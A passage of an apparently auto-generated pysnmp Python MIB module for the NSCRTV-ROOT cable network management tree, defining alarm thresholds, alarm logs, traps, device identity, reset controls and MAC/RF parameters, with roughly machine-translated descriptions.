if mibBuilder.loadTexts: analogAlarmState.setDescription('The parameters of the current state of alarm.')
analogAlarmHIHI = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 4), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: analogAlarmHIHI.setStatus('mandatory')
if mibBuilder.loadTexts: analogAlarmHIHI.setDescription('Alarm HIHI high threshold value. This object should be stored in non-volatile memory.')
analogAlarmHI = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 5), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: analogAlarmHI.setStatus('mandatory')
if mibBuilder.loadTexts: analogAlarmHI.setDescription('HI high alarm threshold value. This object should be stored in non-volatile memory.')
analogAlarmLO = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 6), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: analogAlarmLO.setStatus('mandatory')
if mibBuilder.loadTexts: analogAlarmLO.setDescription('LO low alarm threshold value. This object should be stored in non-volatile memory.')
analogAlarmLOLO = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 7), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: analogAlarmLOLO.setStatus('mandatory')
if mibBuilder.loadTexts: analogAlarmLOLO.setDescription('Alarm LOLO very low threshold value. This object should be stored in non-volatile memory.')
analogAlarmDeadband = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 8), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: analogAlarmDeadband.setStatus('mandatory')
if mibBuilder.loadTexts: analogAlarmDeadband.setDescription('Dead-alarm threshold value. After the warning, parameter values should be restored to the alarm threshold and alarm threshold and the difference between the absolute value greater than the value of dead zone, the alarm can be removed. This object should be stored in nonvolatile memory.')
discretePropertyTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 1, 2), )
if mibBuilder.loadTexts: discretePropertyTable.setStatus('mandatory')
if mibBuilder.loadTexts: discretePropertyTable.setDescription('Discrete Attribute Table.')
discretePropertyEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 1, 2, 1), ).setIndexNames((0, "NSCRTV-ROOT", "discreteParameterOID"), (0, "NSCRTV-ROOT", "discreteAlarmValue"))
if mibBuilder.loadTexts: discretePropertyEntry.setStatus('mandatory')
if mibBuilder.loadTexts: discretePropertyEntry.setDescription('Attribute Table discrete head. OID coding methods with simulation attribute table')
discreteParameterOID = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 2, 1, 1), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: discreteParameterOID.setStatus('mandatory')
if mibBuilder.loadTexts: discreteParameterOID.setDescription('Attribute Table discrete index 1: Parameters OID.')
discreteAlarmValue = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: discreteAlarmValue.setStatus('mandatory')
if mibBuilder.loadTexts: discreteAlarmValue.setDescription('Attribute Table discrete index 2: parameter values. When the equipment value of this parameter values, and so will be dealt with a warning.')
discreteAlarmEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("disable", 1), ("enableMajor", 2), ("enableMinor", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: discreteAlarmEnable.setStatus('mandatory')
if mibBuilder.loadTexts: discreteAlarmEnable.setDescription('When the alarm so that it can open the (2 or 3), this parameter allows for alarm processing. If the alarm so that it can shut down (1), alarm processing will be carried out. This object default values for the disable (1). This object should be stored in non-volatile memory.')
discreteAlarmState = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 2, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 6, 7))).clone(namedValues=NamedValues(("dasNominal", 1), ("dasDiscreteMajor", 6), ("dasDiscreteMinor", 7)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: discreteAlarmState.setStatus('mandatory')
if mibBuilder.loadTexts: discreteAlarmState.setDescription('The parameters of the current state of alarm.')
currentAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 1, 3), )
if mibBuilder.loadTexts: currentAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: currentAlarmTable.setDescription('The current warning Table.')
currentAlarmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 1, 3, 1), ).setIndexNames((0, "NSCRTV-ROOT", "currentAlarmOID"))
if mibBuilder.loadTexts: currentAlarmEntry.setStatus('mandatory')
if mibBuilder.loadTexts: currentAlarmEntry.setDescription('The current warning Table Head. OID coding methods with simulation attribute table.')
currentAlarmOID = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 3, 1, 1), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentAlarmOID.setStatus('mandatory')
if mibBuilder.loadTexts: currentAlarmOID.setDescription('NE, currently in a state of alarm parameters OID Index, and attribute the alarm in the table corresponding parameters OID.')
currentAlarmState = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3, 4, 5, 6, 7))).clone(namedValues=NamedValues(("caasHIHI", 2), ("caasHI", 3), ("caasLO", 4), ("caasLOLO", 5), ("caasDiscreteMajor", 6), ("caasDiscreteMinor", 7)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentAlarmState.setStatus('mandatory')
if mibBuilder.loadTexts: currentAlarmState.setDescription('Warning parameters of the current state of alarm.')
currentAlarmValue = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 3, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentAlarmValue.setStatus('mandatory')
if mibBuilder.loadTexts: currentAlarmValue.setDescription("Alarm parameter's value.")
alarmLogNumberOfEntries = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 2, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alarmLogNumberOfEntries.setStatus('mandatory')
if mibBuilder.loadTexts: alarmLogNumberOfEntries.setDescription('Alarm record number of records in the table.')
alarmLogLastIndex = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 2, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alarmLogLastIndex.setStatus('mandatory')
if mibBuilder.loadTexts: alarmLogLastIndex.setDescription('Recently a warning the index of the records.')
alarmLogTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 2, 3), )
if mibBuilder.loadTexts: alarmLogTable.setStatus('mandatory')
if mibBuilder.loadTexts: alarmLogTable.setDescription('Alarm record form, at least support 16 record. Each table in the registration of a new record, the management agent (transponder) managers should send traps news.')
alarmLogEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 2, 3, 1), ).setIndexNames((0, "NSCRTV-ROOT", "alarmLogIndex"))
if mibBuilder.loadTexts: alarmLogEntry.setStatus('mandatory')
if mibBuilder.loadTexts: alarmLogEntry.setDescription('Alarm Sheet Head.')
alarmLogIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 2, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 32767))).setMaxAccess("readonly")
if mibBuilder.loadTexts: alarmLogIndex.setStatus('mandatory')
if mibBuilder.loadTexts: alarmLogIndex.setDescription('The only logo Alarm Index recorded a record in the table, the index value increased from 1 start of each new record, plus 1 until 32,767, a record index of the re-starts at 1. Acting under the management of storage capacity can be the first choice to delete those records, the specific details in this not to achieve provisions.')
alarmLogInformation = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 2, 3, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(17, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: alarmLogInformation.setStatus('mandatory')
if mibBuilder.loadTexts: alarmLogInformation.setDescription('Alarm record information, multi-byte strings, defined as follows: Byte 1 ~ 4: Alarm in time (POSIX format, the previous maximum byte) Byte 5: Alarm types (enumeration, definitions see behind) Byte 6: Alarm value after commonNeStatus Byte 7 ~ m: Alarm parameters object identifier (Basic Encoding Rules (ASN.1)) Byte n ~ z: Alarm parameter values (Basic Encoding Rules (ASN.1)) Alarm enumerated types: 1 NOMINAL 2 HIHI 3 HI 4 LO 5 LOLO 6 Discrete Major 7 Discrete Minor ')
alarmText = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 2, 4), DisplayString())
if mibBuilder.loadTexts: alarmText.setStatus('optional')
if mibBuilder.loadTexts: alarmText.setDescription('This trap targets for the needs of information contained in a text field transponder information is achievable. The field contains the text of the object depends on the definition of alarm parameters, it is uncertain, This object can not access provisions.')
hfcAlarmEvent = NotificationType((1, 3, 6, 1, 4, 1, 17409, 1) + (0,1)).setObjects(("NSCRTV-ROOT", "commonPhysAddress"), ("NSCRTV-ROOT", "commonNELogicalID"), ("NSCRTV-ROOT", "alarmLogInformation"), ("NSCRTV-ROOT", "alarmText"))
if mibBuilder.loadTexts: hfcAlarmEvent.setDescription('When detected in the event of alarm information sent this trap, whether bundled alarmText variable parameter under warning object to determine. Some of the parameters only need to bind the alarm first three variables.')
commonAdminGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1))
commonAdminUseRf = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2))
commonAdminUseEthernet = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3))
commonMACGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1))
commonRfGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 2))
commonMacAddress = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 1))
commonBackoffParams = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 2))
commonMacStats = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 3))
commonAgentGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1))
commonDeviceGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2))
commonNELogicalID = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 40))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonNELogicalID.setStatus('mandatory')
if mibBuilder.loadTexts: commonNELogicalID.setDescription('The logic of the designated NE identifier (LogicID), the values and attributes of other unrelated NE. This target value should be stored in non-volatile memory.')
commonNEVendor = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonNEVendor.setStatus('mandatory')
if mibBuilder.loadTexts: commonNEVendor.setDescription('NE equipment manufacturers.')
commonNEModelNumber = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonNEModelNumber.setStatus('mandatory')
if mibBuilder.loadTexts: commonNEModelNumber.setDescription('NE equipment models.')
commonNESerialNumber = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonNESerialNumber.setStatus('mandatory')
if mibBuilder.loadTexts: commonNESerialNumber.setDescription('NE equipment serial numbers.')
commonNEVendorInfo = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonNEVendorInfo.setStatus('optional')
if mibBuilder.loadTexts: commonNEVendorInfo.setDescription('NE equipment suppliers other special designated information.')
commonNEStatus = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 6), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonNEStatus.setStatus('mandatory')
if mibBuilder.loadTexts: commonNEStatus.setDescription('With 7.5.4 STATRESP PDU parameters in the corresponding Status Bit 0: CHNLRQST Bit 1: CNTNRM Bit 2: CNTCUR Bit 3: MAJOR ALARMS Bit 4: MINOR ALARMS Bit 5: RSVD1 Bit 6: RSVD2 Bit 7: RSVD3')
commonReset = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1))).clone(namedValues=NamedValues(("reset", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonReset.setStatus('mandatory')
if mibBuilder.loadTexts: commonReset.setDescription("Write'1 'will be reset NE equipment, the value will be included in other non-functional. Reading this object return value'1 ', had no effect on equipment.")
commonAlarmDetectionControl = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("detectionDisabled", 1), ("detectionEnabled", 2), ("detectionEnabledAndRegenerate", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAlarmDetectionControl.setStatus('mandatory')
if mibBuilder.loadTexts: commonAlarmDetectionControl.setDescription('This object used to control the Alarm Detection NE.')
commonNetworkAddress = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 9), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonNetworkAddress.setStatus('mandatory')
if mibBuilder.loadTexts: commonNetworkAddress.setDescription('NE network IP address, NE produce Trap should include this address. This value should be stored in nonvolatile memory. This value can be registered through the MAC order or through local vendors to set up Interface.')
commonCheckCode = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 10), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonCheckCode.setStatus('mandatory')
if mibBuilder.loadTexts: commonCheckCode.setDescription('This target for the detection transponder code configuration of the report. The calculation includes detection code transponder (including management equipment) and the physical configuration parameters stored in non-volatile memory of all the parameters. The detection algorithm calculated by the vendor code provisions. The object should be kept in the value of non-volatile memory, the response thinks highly activated, will be recalculated and re-testing code and the value prior to the commencement of comparison to determine whether or should haveһ��hfcColdStart hfcWarmStart traps. When write this object (SetRequest), the detection code will be recalculated and fill the SetRequest in response to the GetResponse. At this time, will not produce or hfcWarmStart traps hfcColdStart.')
commonTrapCommunityString = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 11), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonTrapCommunityString.setStatus('mandatory')
if mibBuilder.loadTexts: commonTrapCommunityString.setDescription("Definition of Community Trap string. The default value is' public '. The value of this object should be stored in non-volatile memory.")
commonTamperStatus = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("intact", 1), ("compromised", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonTamperStatus.setStatus('optional')
if mibBuilder.loadTexts: commonTamperStatus.setDescription('The safety report NE switching equipment (such as whether to open up the lid) state that this object is called discrete attributes of a corresponding entry in the table. Intact that normal, expressed alarm compromised.')
commonInternalTemperature = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-128, 127))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonInternalTemperature.setStatus('optional')
if mibBuilder.loadTexts: commonInternalTemperature.setDescription('NE equipment Room (machine) temperature, units degrees Celsius. This request object attribute in a corresponding entry in the table.')
commonTime = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 14), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonTime.setStatus('optional')
if mibBuilder.loadTexts: commonTime.setDescription('NE of the POSIX said that the current time (since at 0:00 on January 1, 1970 since the seconds).')
commonVarBindings = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonVarBindings.setStatus('mandatory')
if mibBuilder.loadTexts: commonVarBindings.setDescription('This object can be said to receive SNMP information NE variables bundled the largest number of tables. Value: 0 indicated no restrictions on the maximum number bundled.')
commonResetCause = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 16), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("other", 1), ("powerup", 2), ("command", 3), ("watchdog", 4), ("craft", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonResetCause.setStatus('mandatory')
if mibBuilder.loadTexts: commonResetCause.setDescription('NE said the reasons for the recent reduction.')
commonCraftStatus = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 17), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("disconnected", 1), ("connected", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonCraftStatus.setStatus('mandatory')
if mibBuilder.loadTexts: commonCraftStatus.setDescription('NE local object that this interface (such as RS232 or RS485 interface) state. NE does not necessarily have to support the local interface. NE local interface without affecting the state of its MAC interface functions; If we do not support the local interface, and its value is disconnected.')
commonDeviceOID = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 18), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceOID.setStatus('optional')
if mibBuilder.loadTexts: commonDeviceOID.setDescription('This OID object as a pointer, the equipment was used at MIB (such as Node, two-way amplifier, etc).')
commonDeviceId = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 19), OctetString().subtype(subtypeSpec=ValueSizeConstraint(32, 32)).setFixedLength(32)).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceId.setStatus('optional')
if mibBuilder.loadTexts: commonDeviceId.setDescription('The contents of this object by the designated by the equipment vendors, manufacturers and products it contains special ASCII text messages.')
commondownload = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 20), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1))).clone(namedValues=NamedValues(("reset", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commondownload.setStatus('mandatory')
if mibBuilder.loadTexts: commondownload.setDescription('')
commonPhysAddress = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 1, 1), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonPhysAddress.setStatus('mandatory')
if mibBuilder.loadTexts: commonPhysAddress.setDescription('NE MAC (physical) address.')
commonMaxMulticastAddresses = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(4, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonMaxMulticastAddresses.setStatus('mandatory')
if mibBuilder.loadTexts: commonMaxMulticastAddresses.setDescription('NE equipment to support the greatest number of multicast addresses.')
commonMulticastAddressTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 1, 3), )
if mibBuilder.loadTexts: commonMulticastAddressTable.setStatus('mandatory')
if mibBuilder.loadTexts: commonMulticastAddressTable.setDescription('Multicast addresses Table, the value of this object should be stored in nonvolatile memory.')
commonMulticastAddressEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 1, 3, 1), ).setIndexNames((0, "NSCRTV-ROOT", "commonMulticastAddressIndex"))
if mibBuilder.loadTexts: commonMulticastAddressEntry.setStatus('mandatory')
if mibBuilder.loadTexts: commonMulticastAddressEntry.setDescription('Multicast addresses Table Head.')
commonMulticastAddressIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonMulticastAddressIndex.setStatus('mandatory')
if mibBuilder.loadTexts: commonMulticastAddressIndex.setDescription('Multicast addresses Index.')
commonMulticastAddressNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 1, 3, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(6, 6)).setFixedLength(6)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonMulticastAddressNumber.setStatus('mandatory')
if mibBuilder.loadTexts: commonMulticastAddressNumber.setDescription('Multicast addresses,I/Gbit')
commonBackoffPeriod = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 2, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16383))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonBackoffPeriod.setStatus('mandatory')
if mibBuilder.loadTexts: commonBackoffPeriod.setDescription('Backoff algorithm benchmark time (ms), initialize the default value of 6 ms. The value of this object should be stored in non-volatile memory.')
commonACKTimeoutWindow = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonACKTimeoutWindow.setStatus('mandatory')
if mibBuilder.loadTexts: commonACKTimeoutWindow.setDescription('NE awaiting HE overtime to send ACK response time (ms), initialize the default value is 19 ms. The value of this object should be stored in non-volatile memory.')
commonMaximumMACLayerRetries = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 2, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonMaximumMACLayerRetries.setStatus('mandatory')
if mibBuilder.loadTexts: commonMaximumMACLayerRetries.setDescription('NE data packets sent the greatest number of re-examination. Initialize the default value is 16. The value of this object should be stored in non-volatile memory.')
commonMaxPayloadSize = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 2, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonMaxPayloadSize.setStatus('mandatory')
if mibBuilder.loadTexts: commonMaxPayloadSize.setDescription('From top to bottom line channel packet supported by the largest payload (payload) the length of.')
commonBackoffMinimumExponent = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 2, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonBackoffMinimumExponent.setStatus('mandatory')
if mibBuilder.loadTexts: commonBackoffMinimumExponent.setDescription('The standards body of the MAC layer specification definition of the smallest backoff algorithm index value, default values for 6. This value may not exceed commonBackoffMaximumValue value. The value of this object should be stored in non-volatile memory.')
commonBackoffMaximumExponent = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 2, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonBackoffMaximumExponent.setStatus('mandatory')
if mibBuilder.loadTexts: commonBackoffMaximumExponent.setDescription('The body of the MAC layer standard definition of backoff algorithm for standardizing the largest index value, the default value is 15. This value shall be not less than commonBackoffMinimum value. The value of this object should be stored in non-volatile memory.')
commonForwardPathLOSEvents = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 3, 1), Counter32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonForwardPathLOSEvents.setStatus('optional')
if mibBuilder.loadTexts: commonForwardPathLOSEvents.setDescription('LOS downlink channel in the number of reset to 0.')
commonForwardPathFramingErrors = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 3, 2), Counter32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonForwardPathFramingErrors.setStatus('optional')
if mibBuilder.loadTexts: commonForwardPathFramingErrors.setDescription('Downlink Channel frames wrong number reset to 0.')
commonForwardPathCRCErrors = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 3, 3), Counter32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonForwardPathCRCErrors.setStatus('optional')
if mibBuilder.loadTexts: commonForwardPathCRCErrors.setDescription('CRC errors down the number of reset to 0.')
commonInvalidMacCmds = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 3, 4), Counter32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonInvalidMacCmds.setStatus('optional')
if mibBuilder.loadTexts: commonInvalidMacCmds.setDescription('Invalid MAC layer order wrong number reset to 0.')
commonBackwardPathCollisionTimes = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 3, 5), Counter32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonBackwardPathCollisionTimes.setStatus('optional')
if mibBuilder.loadTexts: commonBackwardPathCollisionTimes.setDescription('Uplink Packet collision frequency, reset to 0.')
commonReturnPathFrequency = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 2, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonReturnPathFrequency.setStatus('mandatory')
if mibBuilder.loadTexts: commonReturnPathFrequency.setDescription('Channel uplink frequency units Hz. The value of this object should be stored in non-volatile memory.')
commonForwardPathFrequency = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonForwardPathFrequency.setStatus('mandatory')
if mibBuilder.loadTexts: commonForwardPathFrequency.setDescription('Downlink frequency channel, flat Hz. The value of this object should be stored in non-volatile memory.')
commonProvisionedReturnPowerLevel = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 2, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 127))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonProvisionedReturnPowerLevel.setStatus('mandatory')
if mibBuilder.loadTexts: commonProvisionedReturnPowerLevel.setDescription('Upstream channel power levels and units for dBuV. When the internal use of this value will be rounded to the nearest support value. Reading return to this subject when the actual value rather than rounding value. The value of this object should be stored in non-volatile memory.')
commonForwardPathReceiveLevel = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 2, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 127))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonForwardPathReceiveLevel.setStatus('optional')
if mibBuilder.loadTexts: commonForwardPathReceiveLevel.setDescription('Downlink Channel receive power levels, units dBuV.')
commonMaxReturnPower = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 2, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 127))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonMaxReturnPower.setStatus('mandatory')
if mibBuilder.loadTexts: commonMaxReturnPower.setDescription('The largest upstream channel power levels and units for dBuV. The value of this object should be stored in non-volatile memory.')
commonAgentBootWay = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("bootDefault", 1), ("bootBOOTP", 2), ("bootTFTP", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentBootWay.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentBootWay.setDescription('Starting Method Acting')
commonAgentReset = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1))).clone(namedValues=NamedValues(("reset", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentReset.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentReset.setDescription("Acting Restart, write'1 'will enable agents to restart, the value will be included in other non-functional. Reading this object return value'1 ', the agent had no effect on.")
commonAgentMaxTraps = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 3), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentMaxTraps.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentMaxTraps.setDescription('Acting detected alarm when sent to the management of the largest number of TRAP, 0 that manufacturers use the default default values.')
commonAgentTrapMinInterval = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 4), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentTrapMinInterval.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapMinInterval.setDescription('Acting TRAP send the minimum spacing units for s.')
commonAgentTrapMaxInterval = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 5), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentTrapMaxInterval.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapMaxInterval.setDescription('Acting TRAP send the largest spacing units for s.')
